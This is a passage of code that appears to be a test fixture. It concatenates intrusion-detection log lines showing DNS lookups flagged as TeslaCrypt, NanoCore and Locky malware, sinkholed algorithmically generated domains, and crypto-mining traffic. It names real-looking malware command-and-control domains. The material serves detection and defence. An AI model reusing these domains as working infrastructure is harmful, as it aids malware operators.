    '"2021-01-11 00:44:17.764761" r2d2 10.3.160.42 14675 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:44:26.164634" r2d2 2.200.110.232 63496 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:44:59.607634" r2d2 2.200.110.232 49190 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:44:59.609564" r2d2 2.200.107.146 40568 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:45:12.577231" r2d2 10.1.19.42 58981 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:17.133458" r2d2 2.200.110.232 64257 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:45:17.140957" r2d2 2.200.107.146 38474 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:45:17.176869" r2d2 2.200.110.233 63640 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:45:28.878165" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (emwnngui).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:28.879610" r2d2 2.200.109.50 62599 8.8.8.8 53 UDP DNS (emwnngui).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:28.879228" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (anptp).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:28.901278" r2d2 8.8.8.8 53 2.200.109.50 61097 UDP DNS (anptp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:28.993896" r2d2 8.8.8.8 53 2.200.109.50 61882 UDP DNS (zhawsl).info "sinkholed by securityscorecard (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:28.994717" r2d2 10.1.20.50 53 10.2.120.16 1695 UDP DNS (zhawsl).info "sinkholed by securityscorecard (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:28.993902" r2d2 8.8.8.8 53 2.200.109.50 61882 UDP DNS (zhawsl).info "sinkholed by securityscorecard (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:28.993904" r2d2 8.8.8.8 53 2.200.109.50 61882 UDP DNS (zhawsl).info "sinkholed by securityscorecard (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:36.265517" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (pgzaru).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:36.265519" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (pgzaru).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:36.265525" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (pgzaru).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:36.266697" r2d2 2.200.109.50 62104 8.8.8.8 53 UDP DNS (pgzaru).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:36.288902" r2d2 8.8.8.8 53 2.200.109.50 62104 UDP DNS (pgzaru).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:36.288907" r2d2 8.8.8.8 53 2.200.109.50 62104 UDP DNS (pgzaru).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:36.396050" r2d2 8.8.8.8 53 2.200.109.50 60197 UDP DNS (frmjfmctzoj).org "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:36.396052" r2d2 8.8.8.8 53 2.200.109.50 60197 UDP DNS (frmjfmctzoj).org "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:36.396884" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (frmjfmctzoj).org "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:36.396043" r2d2 8.8.8.8 53 2.200.109.50 60197 UDP DNS (frmjfmctzoj).org "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:43.647737" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (zpyjprkq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:43.650632" r2d2 2.200.109.50 60661 8.8.8.8 53 UDP DNS (zpyjprkq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:43.672109" r2d2 8.8.8.8 53 2.200.109.50 60661 UDP DNS (zpyjprkq).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:51.035107" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (mbsnd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:51.035377" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (nhapcvxh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:51.035099" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (mbsnd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:51.035105" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (mbsnd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:51.035456" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (nhapcvxh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:51.054436" r2d2 8.8.8.8 53 2.200.109.50 60774 UDP DNS (mbsnd).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:51.059637" r2d2 8.8.8.8 53 2.200.109.50 61451 UDP DNS (pqmnmpdcnl).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:51.154938" r2d2 8.8.8.8 53 2.200.109.50 61106 UDP DNS (nhapcvxh).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:58.319082" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (rgtkbbk).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.319092" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (rgtkbbk).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.319833" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (dnjlhyj).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.319273" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (nzogzfxox).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.319834" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (dnjlhyj).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.319819" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (dnjlhyj).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.320292" r2d2 2.200.109.50 60426 8.8.8.8 53 UDP DNS (rgtkbbk).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.321108" r2d2 2.200.109.50 61427 8.8.8.8 53 UDP DNS (dnjlhyj).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:45:58.340470" r2d2 8.8.8.8 53 2.200.109.50 60894 UDP DNS (jbhqkobykwk).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:45:58.339732" r2d2 8.8.8.8 53 2.200.109.50 61427 UDP DNS (dnjlhyj).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:45:58.340455" r2d2 8.8.8.8 53 2.200.109.50 60894 UDP DNS (jbhqkobykwk).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:05.613246" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (peihoioo).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:05.613252" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (peihoioo).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:05.614672" r2d2 2.200.109.50 62366 8.8.8.8 53 UDP DNS (peihoioo).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:12.910127" r2d2 8.8.8.8 53 2.200.109.50 62191 UDP DNS (ctvyqqdmjod).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:12.910117" r2d2 8.8.8.8 53 2.200.109.50 62191 UDP DNS (ctvyqqdmjod).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:12.910126" r2d2 8.8.8.8 53 2.200.109.50 62191 UDP DNS (ctvyqqdmjod).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:20.277477" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (imiurc).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:20.276990" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (kmautd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:20.277469" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (imiurc).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:20.278216" r2d2 2.200.109.50 62560 8.8.8.8 53 UDP DNS (kmautd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:20.278602" r2d2 2.200.109.50 62249 8.8.8.8 53 UDP DNS (imiurc).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:20.299107" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (kmautd).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:27.184986" r2d2 2.200.110.232 49371 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:46:27.187140" r2d2 2.200.107.146 63784 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:46:27.214611" r2d2 2.200.110.233 63272 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:46:27.561015" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (wtzwjbyxf).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.561288" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (fxgatped).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.561290" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (fxgatped).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.561280" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (fxgatped).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.561714" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (yvnkecy).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.562193" r2d2 2.200.109.50 60198 8.8.8.8 53 UDP DNS (fxgatped).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.562786" r2d2 2.200.109.50 60783 8.8.8.8 53 UDP DNS (yvnkecy).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:27.581088" r2d2 8.8.8.8 53 2.200.109.50 61137 UDP DNS (wtzwjbyxf).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:27.585503" r2d2 8.8.8.8 53 2.200.109.50 60783 UDP DNS (yvnkecy).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:27.585505" r2d2 8.8.8.8 53 2.200.109.50 60783 UDP DNS (yvnkecy).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:27.586217" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (yvnkecy).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.147416" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (qqtqlolvgzg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.147424" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (qqtqlolvgzg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.147062" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (hgdnbonlpwr).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.148188" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (injvteavlh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.147401" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (qqtqlolvgzg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.148175" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (injvteavlh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.148194" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (injvteavlh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.148311" r2d2 2.200.109.50 61735 8.8.8.8 53 UDP DNS (qqtqlolvgzg).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:35.166297" r2d2 8.8.8.8 53 2.200.109.50 62153 UDP DNS (hgdnbonlpwr).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.166356" r2d2 8.8.8.8 53 2.200.109.50 62153 UDP DNS (hgdnbonlpwr).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.166348" r2d2 8.8.8.8 53 2.200.109.50 62153 UDP DNS (hgdnbonlpwr).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.168264" r2d2 8.8.8.8 53 2.200.109.50 61472 UDP DNS (injvteavlh).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.170529" r2d2 8.8.8.8 53 2.200.109.50 61735 UDP DNS (qqtqlolvgzg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:35.170724" r2d2 8.8.8.8 53 2.200.109.50 61735 UDP DNS (qqtqlolvgzg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:40.921617" r2d2 2.200.109.177 54984 8.8.8.8 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:46:42.453060" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (vkzhu).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:42.453111" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS (vkzhu).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:42.452866" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (zcjabwcry).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:42.455199" r2d2 2.200.109.50 61061 8.8.8.8 53 UDP DNS (lttdntpbcpq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:42.453854" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (lttdntpbcpq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:42.477407" r2d2 8.8.8.8 53 2.200.109.50 60522 UDP DNS (njnjxqsfojf).biz "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:42.478083" r2d2 10.1.20.50 53 10.2.120.16 1690 UDP DNS (njnjxqsfojf).biz "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:46:42.628313" r2d2 8.8.8.8 53 2.200.109.50 62259 UDP DNS (vkzhu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:42.628305" r2d2 8.8.8.8 53 2.200.109.50 62259 UDP DNS (vkzhu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:43.381593" r2d2 2.200.110.232 64421 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:46:43.388882" r2d2 2.200.107.146 45473 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:46:45.837547" r2d2 2.200.110.232 49439 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:46:45.867581" r2d2 2.200.110.233 64185 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:46:50.141549" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS (pchtkvlniad).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141824" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (nxpxwg).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141851" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (tedryu).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141845" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (nxpxwg).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141835" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (nxpxwg).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141868" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (tedryu).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141858" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (tedryu).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.141947" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS (eluxne).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.142198" r2d2 2.200.109.50 62184 8.8.8.8 53 UDP DNS (pchtkvlniad).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.143295" r2d2 2.200.109.50 61703 8.8.8.8 53 UDP DNS (eluxne).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:46:50.162386" r2d2 8.8.8.8 53 2.200.109.50 61703 UDP DNS (eluxne).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:50.164712" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (eluxne).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:50.256798" r2d2 8.8.8.8 53 2.200.109.50 61022 UDP DNS (tedryu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:50.256786" r2d2 8.8.8.8 53 2.200.109.50 61022 UDP DNS (tedryu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:50.256767" r2d2 8.8.8.8 53 2.200.109.50 61022 UDP DNS (tedryu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:46:54.658490" r2d2 2.200.105.226 58719 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:46:57.438732" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (bjcpq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.743956" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (unyohnutu).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.743945" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (unyohnutu).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.743958" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (unyohnutu).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.744217" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (cewpq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.744227" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (cewpq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.745165" r2d2 2.200.109.50 60319 8.8.8.8 53 UDP DNS (unyohnutu).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.745178" r2d2 2.200.109.50 61368 8.8.8.8 53 UDP DNS (cewpq).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:04.764618" r2d2 8.8.8.8 53 2.200.109.50 62601 UDP DNS (ncntjfapgnc).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:04.764628" r2d2 8.8.8.8 53 2.200.109.50 62601 UDP DNS (ncntjfapgnc).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:06.469709" r2d2 2.200.107.146 31185 178.62.208.8 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:47:06.465966" r2d2 2.200.110.232 63656 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:47:06.798673" r2d2 2.200.110.232 64336 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:10.678947" r2d2 10.1.19.42 58982 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:12.022647" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (wbjdzkv).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.022477" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS (nbhay).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.022644" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (wbjdzkv).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.022813" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (kbftsgao).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.022799" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (kbftsgao).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.022636" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (wbjdzkv).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.023543" r2d2 2.200.109.50 60386 8.8.8.8 53 UDP DNS (nbhay).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.024322" r2d2 2.200.109.50 60929 8.8.8.8 53 UDP DNS (kbftsgao).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:12.045072" r2d2 8.8.8.8 53 2.200.109.50 60929 UDP DNS (kbftsgao).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:12.045246" r2d2 8.8.8.8 53 2.200.109.50 61501 UDP DNS (wbjdzkv).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:12.045248" r2d2 8.8.8.8 53 2.200.109.50 61501 UDP DNS (wbjdzkv).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:12.045234" r2d2 8.8.8.8 53 2.200.109.50 61501 UDP DNS (wbjdzkv).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:13.137321" r2d2 8.8.8.8 53 2.200.109.50 62114 UDP DNS (zycfkiiwe).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:13.136699" r2d2 8.8.8.8 53 2.200.109.50 60386 UDP DNS (nbhay).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:13.138120" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (zycfkiiwe).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:13.137330" r2d2 8.8.8.8 53 2.200.109.50 62114 UDP DNS (zycfkiiwe).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:13.137327" r2d2 8.8.8.8 53 2.200.109.50 62114 UDP DNS (zycfkiiwe).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:19.297501" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (igdgjdb).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.297516" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (igdgjdb).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.298023" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (zqjpnmd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.298044" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (zqjpnmd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.298034" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS (zqjpnmd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.298430" r2d2 2.200.109.50 60346 8.8.8.8 53 UDP DNS (igdgjdb).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.298837" r2d2 2.200.109.50 61883 8.8.8.8 53 UDP DNS (zqjpnmd).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:19.317771" r2d2 10.1.20.50 53 10.2.120.16 1695 UDP DNS (zqjpnmd).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:19.651420" r2d2 8.8.8.8 53 2.200.109.50 62031 UDP DNS (cxnuyxvbnlq).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:19.651559" r2d2 8.8.8.8 53 2.200.109.50 62031 UDP DNS (cxnuyxvbnlq).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:26.575141" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (hfkjmh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:26.575131" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (hfkjmh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:26.576114" r2d2 2.200.109.50 60775 8.8.8.8 53 UDP DNS (hfkjmh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:26.575142" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS (hfkjmh).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:26.594865" r2d2 8.8.8.8 53 2.200.109.50 61836 UDP DNS (kdtcclfmxn).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:26.596949" r2d2 2.200.110.232 64831 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:47:26.595593" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (kdtcclfmxn).net "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:26.598079" r2d2 8.8.8.8 53 2.200.109.50 60775 UDP DNS (hfkjmh).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:26.598091" r2d2 8.8.8.8 53 2.200.109.50 60775 UDP DNS (hfkjmh).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 00:47:26.600714" r2d2 2.200.107.146 21213 178.62.208.8 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:47:26.709002" r2d2 8.8.8.8 53 2.200.109.50 61806 UDP DNS (fwoffgpzltm).org "consonant threshold no such domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:47:27.455283" r2d2 2.200.109.177 54984 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960042" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (iftwqpic).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960024" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (iftwqpic).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960702" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (hypguvj).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960717" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (hypguvj).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960922" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (cpavry).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960932" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS (cpavry).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.960722" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS (hypguvj).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:33.961645" r2d2 2.200.109.50 60495 8.8.8.8 53 UDP DNS (hypguvj).cc "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:47:34.011501" r2d2 8.8.8.8 53 2.200.109.50 61009 UDP DNS (hggfsplmmg).info "consonant threshold no such domain (suspicious)" (heuristic)\n' +
